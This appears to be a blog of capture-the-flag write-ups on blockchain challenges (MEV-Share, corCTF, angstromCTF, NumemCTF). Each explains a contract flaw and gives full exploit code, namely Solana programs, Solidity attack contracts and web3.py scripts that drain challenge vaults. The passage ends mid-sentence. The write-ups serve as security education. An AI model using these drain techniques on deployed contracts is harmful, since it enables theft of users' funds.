  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x27100"
}

MevShareCTFMagicNumber

V1

https://goerli.etherscan.io/address/0x118Bcb654d9A7006437895B51b5cD4946bF6CdC2#code

contract MevShareCTFMagicNumberV1 is MevShareCTFMagicNumber {
    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFMagicNumber(_mevShareCaptureLogger) payable {
    }

    function claimReward(uint256 _magicNumber) external {
        require(claimRewardInternal(_magicNumber, 201));
    }
}

contract MevShareCTFMagicNumber is MevShareCTFBase {
    uint256 public activeBlock;
    uint256 private magicNumber;

    event Activate(uint256 lowerBound, uint256 upperBound);

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFBase(_mevShareCaptureLogger) payable {
    }

    function activateRewardMagicNumber(uint256 _lowerBound, uint256 _upperBound, uint256 _magicNumber) external payable onlyOwner {
        require (_lowerBound <= _magicNumber && _upperBound >= _magicNumber);
        activeBlock = block.number;
        magicNumber = _magicNumber;
        emit Activate(_lowerBound, _upperBound);
    }

    function claimRewardInternal(uint256 _magicNumber, uint256 _captureId) internal returns (bool) {
        if (activeBlock != block.number || _magicNumber != magicNumber) {
            return false;
        }
        activeBlock = 0;
        magicNumber = 0;
        mevShareCaptureLogger.registerCapture(_captureId, tx.origin);
        return true;
    }
}

{
  "hash": "0xd83e6a0196e0916e6bff1cd70815c77a91c62be49bd181ff6a6c49d5d095d57b",
  "logs": [
    {
      "address": "0x118bcb654d9a7006437895b51b5cd4946bf6cdc2",
      "topics": [
        "0x86a27c2047f889fafe51029e28e24f466422abe8a82c0c27de4683dda79a0b5d"
      ],
      "data": "0x000000000000000000000000000000000000000000000000000d019ab51ef141000000000000000000000000000000000000000000000000000d019ab51ef169"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x8ca0"
}

We only know lower bound and upper bound, so we can bruteforce with "canRevert": True

Acutally, during the ctf, I misunderstood that if I pass a wrong magicNumber, my transaction is revert.

But when I writing this post, canRevert didn't matter.

bundle = {
  hash,
  tx of calling claimReward() and canRevert: True,
  tx of calling claimReward() and canRevert: True,
  tx of calling claimReward() and canRevert: True,
}

V2

https://goerli.etherscan.io/address/0x9BE957D1c1c1F86Ba9A2e1215e9d9EEFdE615a56#code

contract MevShareCTFMagicNumberV2 is MevShareCTFMagicNumber {
    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFMagicNumber(_mevShareCaptureLogger) payable {
    }

    function claimReward(uint256 _magicNumber) external {
        require(tx.origin == msg.sender);
        require(claimRewardInternal(_magicNumber, 202));
    }
}

contract MevShareCTFMagicNumber is MevShareCTFBase {
    uint256 public activeBlock;
    uint256 private magicNumber;

    event Activate(uint256 lowerBound, uint256 upperBound);

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFBase(_mevShareCaptureLogger) payable {
    }

    function activateRewardMagicNumber(uint256 _lowerBound, uint256 _upperBound, uint256 _magicNumber) external payable onlyOwner {
        require (_lowerBound <= _magicNumber && _upperBound >= _magicNumber);
        activeBlock = block.number;
        magicNumber = _magicNumber;
        emit Activate(_lowerBound, _upperBound);
    }

    function claimRewardInternal(uint256 _magicNumber, uint256 _captureId) internal returns (bool) {
        if (activeBlock != block.number || _magicNumber != magicNumber) {
            return false;
        }
        activeBlock = 0;
        magicNumber = 0;
        mevShareCaptureLogger.registerCapture(_captureId, tx.origin);
        return true;
    }
}

{
  "hash": "0x3217b8c344748db113616ba72f3058632f08c468f5df4a2476143d2629761a1b",
  "logs": [
    {
      "address": "0x9be957d1c1c1f86ba9a2e1215e9d9eefde615a56",
      "topics": [
        "0x86a27c2047f889fafe51029e28e24f466422abe8a82c0c27de4683dda79a0b5d"
      ],
      "data": "0x00000000000000000000000000000000000000000000000000066d947bde761200000000000000000000000000000000000000000000000000066d947bde763a"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x8ca0"
}

tx.origin == msg.sender statment is added to claimReward().

But we can use the V1 solution since we are EoA.

V3

https://goerli.etherscan.io/address/0xe8b7475e2790409715af793f799f3cc80de6f071#code

contract MevShareCTFMagicNumberV3 is MevShareCTFMagicNumber {
    // V3 only gets one shot per tx.origin. If any tx lands that is incorrect, that tx.origin does not get another shot
    mapping(address => bool) public registeredV3Attempts;

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFMagicNumber(_mevShareCaptureLogger) payable {
    }

    function claimReward(uint256 _magicNumber) external {
        require(tx.origin == msg.sender);
        require(registeredV3Attempts[tx.origin] == false);
        registeredV3Attempts[tx.origin] = true;
        claimRewardInternal(_magicNumber, 203);
    }
}

contract MevShareCTFMagicNumber is MevShareCTFBase {
    uint256 public activeBlock;
    uint256 private magicNumber;

    event Activate(uint256 lowerBound, uint256 upperBound);

    constructor(MevShareCaptureLogger _mevShareCaptureLogger) MevShareCTFBase(_mevShareCaptureLogger) payable {
    }

    function activateRewardMagicNumber(uint256 _lowerBound, uint256 _upperBound, uint256 _magicNumber) external payable onlyOwner {
        require (_lowerBound <= _magicNumber && _upperBound >= _magicNumber);
        activeBlock = block.number;
        magicNumber = _magicNumber;
        emit Activate(_lowerBound, _upperBound);
    }

    function claimRewardInternal(uint256 _magicNumber, uint256 _captureId) internal returns (bool) {
        if (activeBlock != block.number || _magicNumber != magicNumber) {
            return false;
        }
        activeBlock = 0;
        magicNumber = 0;
        mevShareCaptureLogger.registerCapture(_captureId, tx.origin);
        return true;
    }
}

{
  "hash": "0x1adbe7eccfc09c0d9a344d737d71c7c74dfee7d88c785594d72b1445f162f2a3",
  "logs": [
    {
      "address": "0xe8b7475e2790409715af793f799f3cc80de6f071",
      "topics": [
        "0x86a27c2047f889fafe51029e28e24f466422abe8a82c0c27de4683dda79a0b5d"
      ],
      "data": "0x00000000000000000000000000000000000000000000000000158d0d9733330300000000000000000000000000000000000000000000000000158d0d9733332b"
    }
  ],
  "txs": null,
  "mevGasPrice": "0x2faf080",
  "gasUsed": "0x8ca0"
}

We cannot use V1 solution because if we get it wrong once, we can't try it forever.

I stupidly used the same V1 and V2 codes and it became a challenge that I couldn't solve. :rofl:

As I set canRevert as True, my bundle could be processed.

After that,

my idea was that if I make many many bundles and do spamming, then the transaction that is not reverted could be processed.

bundle = {
  hash,
  tx of calling claimReward() and canRevert: False,
}

bundle = {
  hash,
  tx of calling claimReward() and canRevert: False,
}

...

bundle = {
  hash,
  tx of calling claimReward() and canRevert: False,
}

But I got no success.

The reason why this method was wrong was not the contract logic in which the transaction was reverted even if the magic number was wrong.. I misunderstood like V1, V2.

It may be the answer by chance.
https://github.com/y-pakorn/mev-share-ctf-rs/blob/master/src/handler.rs#L92

Every time I tried, I succeeded in half an hour.

It was not be done in Python using Threading with the same transaction configuration and bundle...

Rust's asynchronous programming seems to be excellent..

I don't know why this can be solution or not.

https://github.com/minaminao/ctf-blockchain/tree/main/src/MEVShareCTF

To use "canRevert": False

I can solve this by creating my contract that has a function that checks if I solved the problem

and if I couldn't solve it, I can revert it from the function so that the transaction is reverted.

pragma solidity 0.8.19;

interface IMevShareCaptureLogger {
    function winnerCaptures (address, uint) external view returns (bool);
}

contract Checker {
    IMevShareCaptureLogger public logger = IMevShareCaptureLogger(0x6C9c151642C0bA512DE540bd007AFa70BE2f1312);
    address public me = 0x846603628D071EcD09b876D842a809DF2A93309B;

    function checker() public view {
        require(logger.winnerCaptures(me, 203)==true);
    }
}

bundle = {
  hash,
  tx of calling claimReward() and canRevert: False,
  tx of calling checker() and canRevert: False,
}

corCTF 2023 - blockchain(tribunal, baby-wallet)

gss1 — Mon, 31 Jul 2023 12:58:09 +0900

One Solidity challenge and one Solana challenge were included in corCTF 2023, totalling two blockchian challenges.

tribunal

Analysis

When I analyze the Solana chall, I first check if it uses Anchor.

As this challenge does not include Anchor framework, we could refer to the following example and write a code.

- https://github.com/barsa2000/sekai2022_gft/blob/main/solve/src/entrypoint.rs

and writeups in my blog.

https://hodl.page/entry/angstromctf-2023-Sailors-Revenge#toc2

https://hodl.page/entry/LA-CTF-2023-pwnbreakup-evmvm-sailor#toc10

According to server's logic

1. admin creates config and vault

2. make five proposals

3. deposit 99sol into the vault by vote

4. execute user's ix

5. if a user has more than 90sol, success

Root Cause

During the ctf, I thought there were three vulnerabilities in the problem.

1. In the finding the PDA, it uses a bump that users input, not canonical bump.

2. In withdraw, it does not check if vault's admin is equal to config's admin.

3. After withdraw, it does not decrease the config's balance.

Solve

https://github.com/kangsangsoo/CTF-Writeups/tree/main/tribunal

1. initialize a fake config and a fake vault

2. deposit the fund as much as possible into the fake vault using vote.

3. withdraw the fund as much as the fake config has from the real vault that has 99sol.

4. Repeat 2~3 until I secure more than 90sol.

My first solution was that I set the loop count of for statements(2~3) to 30 without considering memory.

But memory limit error occured.

More precisely, I rewrote the code to minimize the number of for loop.

entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {
        let account_iter = &mut accounts.iter();
        let program = next_account_info(account_iter)?;
        let user = next_account_info(account_iter)?;
        let config_addr = next_account_info(account_iter)?;
        let vault_addr = next_account_info(account_iter)?;
        let fake_config_addr = next_account_info(account_iter)?;;
        let fake_vault_addr = next_account_info(account_iter)?;
        let p4_addr = next_account_info(account_iter)?;
        let my_pg = next_account_info(account_iter)?;
        let sp = next_account_info(account_iter)?;

        let (_fake_config_addr, fake_config_bump) = find_my_program_address(&["CONFIG".as_bytes()], &program.key).unwrap();
        let (_fake_vault_addr, fake_vault_bump) = find_my_program_address(&["VAULT".as_bytes()], &program.key).unwrap();
        let (_p4_addr, _) = Pubkey::find_program_address(&["PROPOSAL".as_bytes(), &4_u8.to_be_bytes()], &program.key);

  

        let fisrt = Instruction::new_with_borsh(
            program.key.clone(),
            &TribunalInstruction::Initialize  {
                config_bump: fake_config_bump, 
                vault_bump: fake_vault_bump,
            },
            vec![
                AccountMeta::new(user.key.clone(), true),
                AccountMeta::new(fake_config_addr.key.clone(), false),
                AccountMeta::new(fake_vault_addr.key.clone(), false),
                AccountMeta::new_readonly(program.key.clone(), false),
                AccountMeta::new_readonly(sp.key.clone(), false),
            ],
        );

        invoke(&fisrt, 
            &[
                user.clone(),
                fake_config_addr.clone(),
                fake_vault_addr.clone(),
                sp.clone(),
                my_pg.clone(),
                program.clone(),
        ]);





        let mut amt = 800_000_000;
        let mut sum = 0;
        let mut balance_of_vault = 98_000_000_000;
        let mut balance_of_fake_vault = 0;


        for i in 0..=7_u8 {
            if i == 7 {
                let fisrt = Instruction::new_with_borsh(
                    program.key.clone(),
                    &TribunalInstruction::Withdraw { amount: 43_000_000_000  },
                    vec![
                        AccountMeta::new(user.key.clone(), true),
                        AccountMeta::new(fake_config_addr.key.clone(), false),
                        AccountMeta::new(fake_vault_addr.key.clone(), false),
                        AccountMeta::new_readonly(program.key.clone(), false),
                        AccountMeta::new_readonly(sp.key.clone(), false),
                    ],
                );
            
                invoke(&fisrt, 
                    &[
                        user.clone(),
                        fake_vault_addr.clone(),
                        fake_config_addr.clone(),
                        sp.clone(),
                        my_pg.clone(),
                        program.clone(),
                ]);
                break
            }

            balance_of_fake_vault += amt;

            let fisrt = Instruction::new_with_borsh(
                program.key.clone(),
                &TribunalInstruction::Vote { proposal_id: 4, amount: amt },
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(fake_config_addr.key.clone(), false),
                    AccountMeta::new(fake_vault_addr.key.clone(), false),
                    AccountMeta::new(p4_addr.key.clone(), false),
                    AccountMeta::new_readonly(program.key.clone(), false),
                    AccountMeta::new_readonly(sp.key.clone(), false),
                ],
            );

            invoke(&fisrt, 
                &[
                    user.clone(),
                    fake_vault_addr.clone(),
                    fake_config_addr.clone(),
                    p4_addr.clone(),
                    sp.clone(),
                    my_pg.clone(),
                    program.clone(),
            ]);




            let target = std::cmp::min(balance_of_fake_vault-100000, balance_of_vault);
            balance_of_vault -= target;
            sum += target;

            let fisrt = Instruction::new_with_borsh(
                program.key.clone(),
                &TribunalInstruction::Withdraw { amount: target},
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(fake_config_addr.key.clone(), false),
                    AccountMeta::new(vault_addr.key.clone(), false),
                    AccountMeta::new_readonly(program.key.clone(), false),
                    AccountMeta::new_readonly(sp.key.clone(), false),
                ],
            );

            invoke(&fisrt, 
                &[
                    user.clone(),
                    vault_addr.clone(),
                    fake_config_addr.clone(),
                    sp.clone(),
                    my_pg.clone(),
                    program.clone(),
            ]);

       
            amt = target;
        }


        Ok(())        
    }

Feedback

I missed the overflow in vote, author's intention.

https://github.com/kangsangsoo/CTF-Writeups/blob/381ffd076c5264382b96f218a9513aed959aa393/tribunal/program/src/processor.rs#L316C5-L316C118

shorter and easier

1. initialize a fake config.

2. deposit 0.000000001sol into the vault using vote, causing the overflow in the fake config.

3. withdraw 90sol from the real vault that has 99sol.

entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {
        let account_iter = &mut accounts.iter();
        let program = next_account_info(account_iter)?;
        let user = next_account_info(account_iter)?;
        let config_addr = next_account_info(account_iter)?;
        let vault_addr = next_account_info(account_iter)?;
        let fake_config_addr = next_account_info(account_iter)?;;
        let fake_vault_addr = next_account_info(account_iter)?;
        let p4_addr = next_account_info(account_iter)?;
        let my_pg = next_account_info(account_iter)?;
        let sp = next_account_info(account_iter)?;

        let (_fake_config_addr, fake_config_bump) = find_my_program_address(&["CONFIG".as_bytes()], &program.key).unwrap();
        let (_fake_vault_addr, fake_vault_bump) = find_my_program_address(&["VAULT".as_bytes()], &program.key).unwrap();
        let (_p4_addr, _) = Pubkey::find_program_address(&["PROPOSAL".as_bytes(), &4_u8.to_be_bytes()], &program.key);

  

        let fisrt = Instruction::new_with_borsh(
            program.key.clone(),
            &TribunalInstruction::Initialize  {
                config_bump: fake_config_bump, 
                vault_bump: fake_vault_bump,
            },
            vec![
                AccountMeta::new(user.key.clone(), true),
                AccountMeta::new(fake_config_addr.key.clone(), false),
                AccountMeta::new(fake_vault_addr.key.clone(), false),
                AccountMeta::new_readonly(program.key.clone(), false),
                AccountMeta::new_readonly(sp.key.clone(), false),
            ],
        );

        invoke(&fisrt, 
            &[
                user.clone(),
                fake_config_addr.clone(),
                fake_vault_addr.clone(),
                sp.clone(),
                my_pg.clone(),
                program.clone(),
        ]);


        
        let fisrt = Instruction::new_with_borsh(
            program.key.clone(),
            &TribunalInstruction::Vote { proposal_id: 4, amount: 1 },
            vec![
                AccountMeta::new(user.key.clone(), true),
                AccountMeta::new(fake_config_addr.key.clone(), false),
                AccountMeta::new(fake_vault_addr.key.clone(), false),
                AccountMeta::new(p4_addr.key.clone(), false),
                AccountMeta::new_readonly(program.key.clone(), false),
                AccountMeta::new_readonly(sp.key.clone(), false),
            ],
        );

        invoke(&fisrt, 
            &[
                user.clone(),
                fake_vault_addr.clone(),
                fake_config_addr.clone(),
                p4_addr.clone(),
                sp.clone(),
                my_pg.clone(),
                program.clone(),
        ]);


        let fisrt = Instruction::new_with_borsh(
            program.key.clone(),
            &TribunalInstruction::Withdraw { amount: 90_000_000_000},
            vec![
                AccountMeta::new(user.key.clone(), true),
                AccountMeta::new(fake_config_addr.key.clone(), false),
                AccountMeta::new(vault_addr.key.clone(), false),
                AccountMeta::new_readonly(program.key.clone(), false),
                AccountMeta::new_readonly(sp.key.clone(), false),
            ],
        );

        invoke(&fisrt, 
            &[
                user.clone(),
                vault_addr.clone(),
                fake_config_addr.clone(),
                sp.clone(),
                my_pg.clone(),
                program.clone(),
        ]);



        Ok(())        
    }

baby-wallet

Root Cause

BabyWallet::transferFrom does not check if from is equal to to.

If from and to are the same, the balance is increased by amt because the increase of to's balance follows the decrease of from's balance.

    function transferFrom(address from, address to, uint256 amt) public { 
        uint256 allowedAmt = allowances[from][msg.sender];
        uint256 fromBalance = balances[from];
        uint256 toBalance = balances[to];

        require(fromBalance >= amt, "You can't transfer that much");
        require(allowedAmt >= amt, "You don't have approval for that amount");

        balances[from] = fromBalance - amt;
        balances[to] = toBalance + amt;
        allowances[from][msg.sender] = allowedAmt - amt;
    }

Solve

In order to get a flag, we must steal the 100ether in BabyWallet.

Deposit 100ether.
Increase allowances[my][my] by 100ether.
Execute transferFrom(my, my, 100ether).
Withdraw 200ether.

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("https://baby-wallet.be.ax/1ac67d77-6984-456f-932a-77ce079bcaf0"))

#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0xd163bd21d98ba16997ac5e4248f4d576798c2eaad59fdc2b23005de91bd86d30'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0xe18440794A816142E5081b3A2CcED5835d53ef18
myAddr = Public_Address
cont = "0xB74539Aa48Ff22f539851bFf1cCf14BF5A9A7356" # deployed contract's address


def deposit():
    f = open('baby.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["deposit"]().build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 100 * 10 ** 18,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def approve():
    f = open('baby.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["approve"](myAddr, 100 * 10 ** 18).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)


def transferFrom():
    f = open('baby.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["transferFrom"](myAddr, myAddr, 100 * 10 ** 18).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def withdraw():
    f = open('baby.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=cont, abi=abi)
    func_call = contract.functions["withdraw"](200 * 10 ** 18).build_transaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

deposit()
approve()
transferFrom()
withdraw()

angstromctf 2023 - pwn(Sailor's Revenge)

gss1 — Thu, 27 Apr 2023 20:19:47 +0900

Sailor has been presented in LACTF2023 by Aplet123.

The write-up can be found on my blog.

Sailor's Revenge

Root Cause

/chall/src/processor.rs

pub struct SailorUnion {
    available_funds: u64,
    authority: [u8; 32],
}

pub struct Registration {
    balance: i64,
    member: [u8; 32],
}

It is observed that the sizes of two structs are identical, and the balance of the Registration can have a negative value. (This is a very strong hint)

pub fn register_member(
    program_id: &Pubkey,
    accounts: &[AccountInfo],
    member: [u8; 32],
) -> ProgramResult {

	// ...

    let ser_data = Registration {
        balance: -100,
        member,
        // sailor_union: sailor_union.key.to_bytes(),
    }
    .try_to_vec()?;
    
    // ...

    registration.data.borrow_mut().copy_from_slice(&ser_data);

In register_member() function, the balance of registration struct stores a value of -100.

pub fn strike_pay(program_id: &Pubkey, accounts: &[AccountInfo], amt: u64) -> ProgramResult {
    msg!("strike pay {}", amt);

    let iter = &mut accounts.iter();

    let sailor_union = next_account_info(iter)?;
    assert!(!sailor_union.is_signer);
    assert!(sailor_union.is_writable);
    assert!(sailor_union.owner == program_id);

    let member = next_account_info(iter)?;
    assert!(member.is_writable);
    assert!(member.owner == &system_program::ID);

    let authority = next_account_info(iter)?;
    assert!(authority.is_signer);
    assert!(authority.owner == &system_program::ID);

    let (vault_addr, vault_bump) = Pubkey::find_program_address(&[b"vault"], program_id);
    let vault = next_account_info(iter)?;
    assert!(!vault.is_signer);
    assert!(vault.is_writable);
    assert!(vault.owner == &system_program::ID);
    assert!(vault.key == &vault_addr);

    let system = next_account_info(iter)?;
    assert!(system.key == &system_program::ID);

    let mut data = SailorUnion::try_from_slice(&sailor_union.data.borrow())?;
    assert!(&data.authority == authority.key.as_ref());

    if data.available_funds >= amt {
        data.available_funds -= amt;
        transfer(&vault, &member, amt, &[&[b"vault", &[vault_bump]]])?;
        data.serialize(&mut &mut *sailor_union.data.borrow_mut())?;
        Ok(())
    } else {

To claim strike_pay function,

available_funds of sailor_union must have some value.
address of sailor_union is derived by its authority.

In /server/main.rs ,

    challenge.env.execute_as_transaction(
        &[Instruction::new_with_borsh(
            prog.pubkey(),
            &SailorInstruction::CreateUnion(VAULT_BAL),
            vec![
                AccountMeta::new(sailor_union, false),
                AccountMeta::new(rich_boi.pubkey(), true),
                AccountMeta::new(vault, false),
                AccountMeta::new_readonly(system_program::id(), false),
            ],
        )],
        &[&rich_boi],
    );

The authority of sailor_union is rich_boi.

In create_union() of processor.rs

        let data = SailorUnion {
            available_funds: 0,
            authority: authority.key.to_bytes(),
        };

the available_funds of sailor_union is zero.

We cannot call strike_pay with sailor_union.

So, we should use registration instead of sailor_union.

This can bypass all of the assert statements in strike_pay.

If I claim 100_000_000 coins, the -100 stored in the balance will be cast as a larger value in u64 than 100_000_000.

And

assert!(&data.authority == authority.key.as_ref());

Since member stored is the user, we place user in the position of authority.

Solve

lib.rs

use borsh::{BorshDeserialize, BorshSerialize};

#[derive(Debug, Clone, BorshSerialize,PartialEq, Eq, PartialOrd, Ord)]
pub enum SailorInstruction {
    CreateUnion(u64),
    PayDues(u64),
    StrikePay(u64),
    RegisterMember([u8; 32]),
}

#[derive(Debug, Clone, BorshSerialize, BorshDeserialize, PartialEq, Eq, PartialOrd, Ord)]
pub struct SailorUnion {
    available_funds: u64,
    authority: [u8; 32],
}

#[derive(Debug, Clone, BorshSerialize, BorshDeserialize, PartialEq, Eq, PartialOrd, Ord)]
pub struct Registration {
    balance: i64,
    member: [u8; 32],
}

#[cfg(not(feature = "no-entrypoint"))]
pub mod entrypoint {
    use borsh::BorshSerialize;
    use solana_program::{
        account_info::AccountInfo, entrypoint, entrypoint::ProgramResult, instruction::Instruction,
        msg, program::invoke, pubkey::Pubkey,
        instruction::AccountMeta,
    };

    // use chall::{self, SailorInstruction};
    use crate::SailorInstruction;

    entrypoint!(process_instruction);


    pub fn process_instruction(
        _program_id: &Pubkey,
        accounts: &[AccountInfo],
        _instruction_data: &[u8],
    ) -> ProgramResult {
        let prog = accounts[0].clone();
        let user = accounts[1].clone();
        let vault = accounts[2].clone();
        let sailor_union = accounts[3].clone();
        let registration = accounts[4].clone();
        let rich_boi = accounts[5].clone();
        let system_program = accounts[6].clone();

        let amt = 100_000_000;
        
        msg!("solving program {}", prog.key);


        invoke(
            &Instruction {
                program_id: prog.key.clone(),
                accounts: vec![
                    AccountMeta::new(registration.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(vault.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
                data: SailorInstruction::StrikePay(100_000_000).try_to_vec().unwrap(),
            },
            &[
                user.clone(),          
                registration.clone(),
                vault.clone(),
            ]
        );


        msg!("done solving");

        Ok(())
    }
}

cargo.toml

[package]
edition = "2021"
name = "solve"
version = "0.1.0"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
# sailors-revenge = {path = "../chall", version = "0.1.0"}
solana-program = "1.14.11"
borsh = "0.10.3"

[features]
default = []
no-entrypoint = []
no-idl = []
no-log-ix-name = []

[lib]
crate-type = ["cdylib", "rlib"]

cargo build-bpf

solve.py (check the path of solve.so)

# sample solve script to interface with the server
from pwn import *

# feel free to change this
account_metas = [
    ("program", "-r"), # readonly
    ("user", "sw"), # signer + writable
    ("vault", "-w"), # writable
    ("sailor union", "-w"),
    ("registration", "-w"),
    ("rich boi", "-r"),
    ("system program", "-r"),
]
instruction_data = b"placeholder"

p = remote("challs.actf.co", 31404)
# p = remote("127.0.0.1", 5000)

with open("./solve/target/deploy/solve.so", "rb") as f:
    solve = f.read()

p.sendlineafter(b"program len: \n", str(len(solve)).encode())
p.send(solve)

accounts = {}
for l in p.recvuntil(b"num accounts: \n", drop=True).strip().split(b"\n"):
    [name, pubkey] = l.decode().split(": ")
    accounts[name] = pubkey

p.sendline(str(len(account_metas)).encode())
for (name, perms) in account_metas:
    p.sendline(f"{perms} {accounts[name]}".encode())
p.sendlineafter(b"ix len: \n", str(len(instruction_data)).encode())
p.send(instruction_data)

p.interactive()

actf{maybe_anchor_can_kind_of_protect_me_from_my_own_stupidity}

NumemCTF 2023

gss1 — Sat, 1 Apr 2023 00:17:36 +0900

I participated in NumemCTF alone and just solved 7 easy challs.

I learned that there are many ways to use assembly in Solidity!

I will add my solution of challenges unsolved.

SimpleCall

Analysis

This code is written in solidity 0.7.0 and does not use SafeMath so that it is vulnerable to integer overflow.

The function related to transference mostly uses require statements to check whether balance is insufficient.

require(A>B)
require(A-B>0)

First statement is safe from integer overflow but second is not.

	function transfer(address _to, uint _value) public returns (bool) {
	    require(balanceOf[msg.sender] - _value >= 0); // vulnerable
        //...
    }

Solve

attack.sol

contract Attack {
    ExistingStock victim;

	constructor(address _victim) {
        victim = ExistingStock(_victim);
    }

    function attack() public {
        victim.transfer(address(victim), 300000);
        victim.privilegedborrowing(0, address(0), address(victim), abi.encodeWithSignature("approve(address,uint256)", address(this), 300000));
        victim.setflag();
    }
}

attack.py

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://8.218.239.44:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey = '0x503f38a9c967ed597e47fe25643985f032b072db8075426a92110f82df48dfcb'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695
input()
myAddr = Public_Address
cont = "0x1DA8b515684B65D23aEFF860F06f2957D37E6E4D" # deployed contract's address

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount,
        chainId = w3.eth.chain_id,
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

send_ether(myAddr, "0x6B18e0E7Aec85A4c7811eDb94615bd3f582873dA",prikey, 10**14)
input()

def attack(my_addr):
    f = open('att.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=my_addr, abi=abi)
    func_call = contract.functions["attack"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id,
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def attack_deploy():
    f = open("att.abi", "r"); contract_abi= f.read(); f.close()
    f = open("att.bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(cont).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

attack(attack_deploy())

# flag{0xda0b5e252cfd5b31e5849642f549134fb5304d6c}

Counter

Analysis

The constructor of Deployer contract takes an argument of type 'bytes' and inserts bytecode by using inline assembly.

I am curious about how this works!

Have you heard honeypot?

It is deployed by using this technique.

https://hackernoon.com/how-to-exploit-a-solidity-constructor

The challenge requires the length of code is less than 25.

require(code.length<=24);

However, it is known general contract code is greater than 24 because they have dispatch routine.

In order to reduce, we use inline assembly instead of solidity.

{           
    sstore(0x0, caller())
}
// solc --yul --yul-dialect evm want.yul | grep Binary -A1
// 33600055

In the code

